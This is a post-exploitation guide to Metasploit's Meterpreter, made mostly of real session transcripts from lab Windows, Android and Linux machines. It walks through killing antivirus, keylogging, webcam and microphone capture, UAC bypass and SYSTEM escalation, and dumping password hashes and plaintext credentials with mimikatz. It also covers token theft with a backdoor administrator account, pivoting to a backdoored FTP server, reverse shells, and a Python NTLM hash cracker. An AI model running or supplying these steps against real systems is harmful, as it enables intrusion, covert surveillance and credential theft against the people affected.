Meterpreter Guide (Post-Exploitation Techniques)
Basic commands
Commonly used Meterpreter commands

| Command | Purpose |
| --- | --- |
| background | Background the current Meterpreter session and return to the msfconsole prompt |
| sessions | List the sessions currently established |
| sessions -i <n> | Interact with session n |
| sessions -l | List the current sessions |
| sessions -k <n> | Kill session n (sessions -K kills every session) |
| bgkill | Kill a background Meterpreter script |
| bglist | List all background scripts that are running |
| bgrun | Run a script as a background thread |
| channel | Show the active channels |
| close | Close a channel |
| exit | Terminate the Meterpreter session |
| quit | Terminate the Meterpreter session |
| interact <id> | Switch into a channel |
| run | Run a script or post module. Press Tab twice after typing run to list everything available; the common ones are autoroute, hashdump, arp_scanner and multi_meter_inject |
| irb | Drop into an interactive Ruby shell inside the session |
| read | Read data from a channel |
| write | Write data to a channel |
| use | Load a Meterpreter extension (older alias of load) |
| load / use | Load an extension such as kiwi, incognito or espia |
| resource | Run an existing .rc resource script |
Android-specific commands
dump_contacts - dump the phone's contact list
dump_sms - dump the SMS messages
send_sms -d 15330252525 -t "hello" - send an SMS from the test phone
geolocate - get the test phone's GPS position
wlan_geolocate - get the test phone's position from nearby Wi-Fi networks
record_mic -d 5 - record 5 seconds of audio from the microphone
webcam_list - list the phone's cameras
webcam_snap - take a photo
webcam_stream - stream the camera live
Windows-specific commands
ps - list processes
getpid - show the PID of the process Meterpreter is running in
sysinfo - show system information
route - show the full routing table
getsystem - attempt automatic escalation to NT AUTHORITY\SYSTEM
getuid - show the user Meterpreter is running as
pwd - show the current working directory on the target
Other commands
Check whether the target is a virtual machine: run post/windows/gather/checkvm
Kill antivirus software: run post/windows/manage/killav
Enable Remote Desktop (RDP): run post/windows/manage/enable_rdp
List the users currently logged on: run post/windows/gather/enum_logged_on_users
List installed applications: run post/windows/gather/enum_applications
Grab a screenshot of the target: load espia ; screengrab
List camera devices: webcam_list
Take a photo: webcam_snap
Stream the camera: webcam_stream
Record the microphone: record_mic
Show the local (attacker-side) working directory: getlwd
Dump the password hashes of the local users: run hashdump
The output is in pwdump format, username:RID:LM hash:NT hash::: (the number is the account's RID, the last component of its SID, not the full SID).
A more capable post module can also be used; it extracts the hashes from the registry when running as SYSTEM and saves them to loot in John the Ripper format: run post/windows/gather/smart_hashdump
Grab the auto-logon username and password: run post/windows/gather/credentials/windows_autologin
Obtain plaintext passwords directly (this needs SYSTEM privileges, so run getsystem first)
shell
Open a Windows command prompt (cmd.exe) on the target; type exit to return to the Meterpreter prompt.
File system commands
File interaction commands

| ID | Command | Description |
| --- | --- | --- |
| 1 | cat | Read the contents of a file |
| 2 | cd | Change directory on the target |
| 3 | cp | Copy a file on the target |
| 4 | mv | Move a file on the target |
| 5 | chmod | Change file permissions (for example chmod 777 shell.elf) |
| 6 | del / rm | Delete a file on the target |
| 7 | dir | List a directory on the target |
| 8 | mkdir | Create a directory on the target |
| 9 | rmdir | Remove a directory on the target |
| 10 | edit | Edit a file |
| 11 | getlwd | Print the local (attacker-side) working directory |
| 12 | getwd | Print the working directory on the target |
| 13 | lcd | Change the local working directory |
| 14 | lls | List the local directory |
| 15 | ls | List files on the target |
| 16 | lpwd | Print the local working directory |
| 17 | pwd | Print the working directory on the target |
| 18 | search | Search for files (search -h shows the options) |
Linux permissions
chmod 777 {filename.ext}
chmod 777 shell.elf
upload
Upload a file to the target, for example upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/
Download a file to the attacker machine, for example download C:\boot.ini /root/ or download "C:\Program Files\Tencent\QQ\Users\295******125\Msg2.0.db" /root/ (quote a path that contains spaces)
search
Search for files, for example
search -d c:\ -f *.doc
search -d c:\Users\xiang\Desktop -f *.txt
enumdesktops
List all accessible window stations and desktops (this is not a count of logged-on users)
ipconfig
Show the target's network interfaces and IP addresses
Other commands
Screenshot
meterpreter > screenshot
Screenshot saved to: /home/jerry/BqXLvJAp.jpeg
System information
meterpreter > sysinfo
Computer        : WIN-2VEIIKHJ7M8
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Capturing keystrokes
Migrate into explorer.exe of the interactive user (session 1) first, so the recorder hooks that user's desktop rather than the process the payload started in:
meterpreter > ps
Process List
============
 PID   PPID  Name          Arch  Session  User                    Path
 ...
 1184  1132  explorer.exe  x64   1        WIN-2VEIIKHJ7M8\小铃铛  C:\Windows\Explorer.EXE
meterpreter > migrate 1184
[*] Migrating from 2496 to 1184...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WIN-2VEIIKHJ7M8
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
[*] Recording keystrokes...
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
Keystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8\小铃铛 started at 2022-06-24 13:22:19 +0800
tgest <^H><^H><^H><^H><^H><^H>test I a mFy<^H><^H>Gu Xiang www. 3
Keylog Recorder exited at 2022-06-24 13:24:03 +0800
In the loot file <^H> marks a Backspace keystroke.
Privilege escalation
The most basic escalation
meterpreter > getuid
Server username: E86004903967404\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Technique 1 creates a service, so it only works when the session already runs with an elevated local administrator token. With UAC enabled, an administrator's medium-integrity session is not enough; that is what the UAC sections below are for.
Escalation through a vulnerability
Windows 7
meterpreter > background
msf6 exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1
SESSION => 1
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168
rhost => 192.168.0.168
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Note that ms17_010_eternalblue is a remote SMB exploit: it takes RHOSTS and has no SESSION option, so the set SESSION 1 above is ignored and a successful run simply delivers a fresh SYSTEM shell over the network. To escalate inside an existing session you need a windows/local module, such as the exploit/windows/local/ms15_051_client_copy_image shown in the prompt, which does take set SESSION 1.
Escalation by bypassing UAC
Windows 7
User Account Control (UAC) is a control mechanism introduced by Microsoft in Windows Vista and later. It prompts the user before an application is granted elevated access to the disk and system files, which helps stop malicious programs (malware) from damaging the system.
meterpreter > background
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
…
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-19 15:45:06 +0800
meterpreter > getuid
Server username: WIN-2VEIIKHJ7M8\小铃铛
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The bypass only elevates a user who is already a member of the local Administrators group (it turns the medium-integrity token into a high-integrity one); it does nothing for a standard user, and it fails when UAC is set to "Always notify".
Triggering the UAC prompt
Windows 10
This module does not bypass anything: it uploads the payload and asks for elevation, so the user sees a normal UAC consent dialog and must click Yes.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/ask
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ask) > set session 1
session => 1
msf6 exploit(windows/local/ask) > set filename payload.exe
filename => payload.exe
msf6 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading payload.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-27 11:39:52 +0800
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Obtaining usernames and passwords
Extracting password hashes
Windows 10
meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::
xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 736  644   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
meterpreter > migrate 736
[*] Migrating from 5724 to 736...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
…
SID               : S-1-5-21-2772671008-4265266102-715737954-1001
        msv :
         [00000003] Primary
         * Username   : xianggu625@126.com
         * Domain     : MicrosoftAccount
         * NTLM       : 4f151ab2d4afdef65f9664b0422ad83f
        tspkg :
        wdigest :
         * Username   : xianggu625@126.com
         * Domain     : MicrosoftAccount
         * Password   : (null)
        kerberos :
         * Username   : xianggu625@126.com
         * Domain     : MicrosoftAccount
         * Password   : (null)
        ssp :
        credman :
        cloudap :
…
Two things to note here. First, kiwi reads LSASS memory from whatever SYSTEM process it lives in, so migrating into lsass.exe is unnecessary; the only hard requirements are SYSTEM (or SeDebugPrivilege) and a Meterpreter whose architecture matches the target (x64 here). Crashing lsass.exe forces a reboot, so migrating into it adds risk without benefit. Second, the wdigest and kerberos passwords are (null) because Windows 8.1 and later no longer keep plaintext credentials in WDigest by default; what remains usable is the NTLM hash, which is exactly what the pass-the-hash re-entry below relies on.
Re-entering
msf6 exploit(windows/local/ask) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f
SMBPass => aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800
meterpreter >
Be careful with what this transcript actually shows. exploit/multi/handler is only a listener: it has no RHOST or SMBPass option, so those set commands are accepted but ignored, and the two sessions appeared because payloads already running on 192.168.0.106 reconnected to the listener. To re-enter a host with a dumped hash (pass-the-hash), use exploit/windows/smb/psexec instead, with RHOSTS set to the target, SMBUser set to the account and SMBPass set to the LM:NTLM pair exactly as hashdump printed it.
Windows 7
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 512  396   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\lsass.exe
meterpreter > migrate 512
[*] Migrating from 1672 to 512...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session           : Interactive from 1
User Name         : 小铃铛
Domain            : WIN-2VEIIKHJ7M8
        msv :
         * LM         : 44efce164ab921caaad3b435b51404ee
         * NTLM       : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1       : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        tspkg :
         * Username   : (null)
         * Domain     : WIN-2VEIIKHJ7M8
         * Password   : 123456
        wdigest :
         * Username   : (null)
         * Domain     : WIN-2VEIIKHJ7M8
         * Password   : 123456
        kerberos :
         * Username   : (null)
         * Domain     : WIN-2VEIIKHJ7M8
         * Password   : 123456
        ssp :
        credman :
The same logon session seen from a standalone mimikatz 2.2.0 (x64) #19041 run on the host through PowerShell (the user name was mis-encoded in the original capture and is restored here):
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session           : Interactive from 1
User Name         : 小铃铛
Domain            : WIN-2VEIIKHJ7M8
Logon Server      : WIN-2VEIIKHJ7M8
Logon Time        : 2022/6/27 14:58:54
SID               : S-1-5-21-2305812133-3308626755-1024735854-1000
        msv :
         [00000003] Primary
         * Username   : 小铃铛
         * Domain     : WIN-2VEIIKHJ7M8
         * LM         : 44efce164ab921caaad3b435b51404ee
         * NTLM       : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1       : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        tspkg :
         * Username   : (null)
         * Domain     : WIN-2VEIIKHJ7M8
         * Password   : 123456
        wdigest :
         * Username   : (null)
         * Domain     : WIN-2VEIIKHJ7M8
         * Password   : 123456
        kerberos :
         * Username   : (null)
         …
Windows 7 still caches the plaintext password for WDigest by default (until KB2871997 is installed and UseLogonCredential is set to 0), which is why this run yields 123456 where the Windows 10 run yielded (null). Also notice that the SAM dump shows an empty LM field (LM hash storage is disabled by default) while the in-memory msv entry still carries a real LM hash for this short password.
Re-entering
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800
meterpreter >
As in the Windows 10 case, multi/handler ignores rhost and SMBPass; the session came from the persistent agent on 192.168.0.158 calling back. Pass-the-hash with the dumped LM:NTLM pair is done with exploit/windows/smb/psexec (RHOSTS, SMBUser, SMBPass), not with the handler.
Token impersonation: adding a user
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 736  644   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
meterpreter > steal_token 736
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
DESKTOP-9A8VFKB\xiang
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\ReportServer
Window Manager\DWM-1

Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT SERVICE\MSSQLFDLauncher
NT SERVICE\MSSQLSERVER
NT SERVICE\MSSQLServerOLAPService
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > add_user tom 123456 -h 192.168.0.106
[*] Attempting to add user tom to host 192.168.0.106
[+] Successfully added user
meterpreter > add_group_user "administrators" tom -h 192.168.0.106
…
Stealing a token from lsass.exe and enumerating delegation tokens both require an already elevated session (SeDebugPrivilege / SeImpersonatePrivilege). Adding a local administrator is a loud action: it writes Security event 4720 (account created) and 4732 (member added to a local group), and the new account shows up in every later hashdump, as tom does further down.
Pivoting
The target is a Linux machine running vsftpd 2.3.4
Windows 10 -> Linux machine running vsftpd 2.3.4
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.0.0/255.255.255.0
Local subnet: 192.168.5.0/255.255.255.0
Local subnet: 192.168.81.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3
[*] Route added
msf6 exploit(windows/local/ask) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.255.0      Session 3

[*] There are currently no IPv6 routes defined.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.171:21 - USER: 331 Please specify the password.
[+] 192.168.0.171:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.171:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 via session 3) at 2022-07-19 17:00:32 +0800
The syntax is route add <subnet> <netmask> <session id>; run post/multi/manage/autoroute does the same thing automatically for every subnet the session can see. The "via session 3" and the source address 192.168.0.106 (the pivot host, not the attacker's 192.168.0.150) on the last line confirm that the exploit traffic was relayed through the compromised Windows 10 machine. Only the Metasploit TCP connections go through the route; the bind-style backdoor payload works here because the connection to port 6200 is also made through the pivot.
Running scripts with Meterpreter
Running VNC
Windows 10
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\xiang\AppData\Local\Temp\eiISyc.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
Execution of the uploaded agent was blocked on this host; running C:\Users\xiang\AppData\Local\Temp\eiISyc.exe by hand inside Windows produces the session below.
meterpreter >
[*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "desktop-9a8vfkb"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Windows 7
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\YNpMWsIZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
meterpreter >
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800
Desktop name "win-2veiikhj7m8"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Migrating processes
meterpreter > run post/windows/manage/migrate
[*] Running module against DESKTOP-9A8VFKB
[*] Current server process: payload.exe (8716)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 9944
[+] Successfully migrated into process 9944
Killing antivirus software
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
Dumping the system password hashes
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[-] Error: ArgumentError wrong number of arguments (given 4, expected 5)
…
The old hashdump script is deprecated and broken on this version, so use the post module instead:
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
or
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
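The hash lines above carry more information than they appear to. An NT hash is simply MD4 over the UTF-16LE encoding of the password, so the same values recur on every host: aad3b435b51404eeaad3b435b51404ee in the LM field means LM hashing is disabled, 31d6cfe0d16ae931b73c59d7e0c089c0 in the NT field means the password is empty, and 32ed87bdb5fdc5e9cba88547376818d4 is what "123456" always hashes to. The following script, an added example for this guide rather than code from Metasploit, parses pwdump-format lines as printed by hashdump and smart_hashdump, flags the empty-password and LM-disabled cases, and checks each NT hash against a small constructed wordlist. MD4 is implemented inline because hashlib's md4 is frequently unavailable on OpenSSL 3 builds; the sample lines are copied from the output above and the wordlist is invented.

```python
"""Parse Meterpreter hashdump (pwdump) lines and test them against a tiny wordlist.

Added example for this guide, not part of Metasploit. Sample lines are copied from
the hashdump output on the page; the wordlist below is constructed for the demo.
"""
import struct

M32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM hash storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def _rol(x, n):
    x &= M32
    return ((x << n) | (x >> (32 - n))) & M32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented inline because hashlib often lacks md4 on OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                            # round 1: F(x,y,z) = (x&y)|(~x&z)
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rol(a + f + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                            # round 2: G = majority
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rol(a + g + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                            # round 3: H = xor
            hh = b ^ c ^ d
            a, b, c, d = d, _rol(a + hh + X[r3_order[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & M32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); this is the fourth field of a pwdump line."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str):
    """Split 'user:RID:LM:NT:::' lines; the '[+]' prefix printed by smart_hashdump is tolerated."""
    rows = []
    for line in text.splitlines():
        line = line.strip().lstrip("[+]").strip()
        if line.count(":") < 4:
            continue                                   # status line, not a hash record
        user, rid, lm, nt = line.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        rows.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt,
                     "lm_disabled": lm == EMPTY_LM, "empty_password": nt == EMPTY_NT})
    return rows


def crack(rows, wordlist):
    """Map each user to the recovered password, '' for an empty password, None if not found."""
    table = {nt_hash(w): w for w in wordlist}
    table[EMPTY_NT] = ""
    return {r["user"]: table.get(r["nt"]) for r in rows}


# Constructed input: lines copied from the hashdump output above, one with a '[+]' prefix.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
[+] xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f:::
"""
WORDLIST = ["password", "123456", "Passw0rd!"]      # constructed, deliberately tiny

if __name__ == "__main__":
    for user, pw in crack(parse_pwdump(SAMPLE), WORDLIST).items():
        print(f"{user}: {pw!r}")
```

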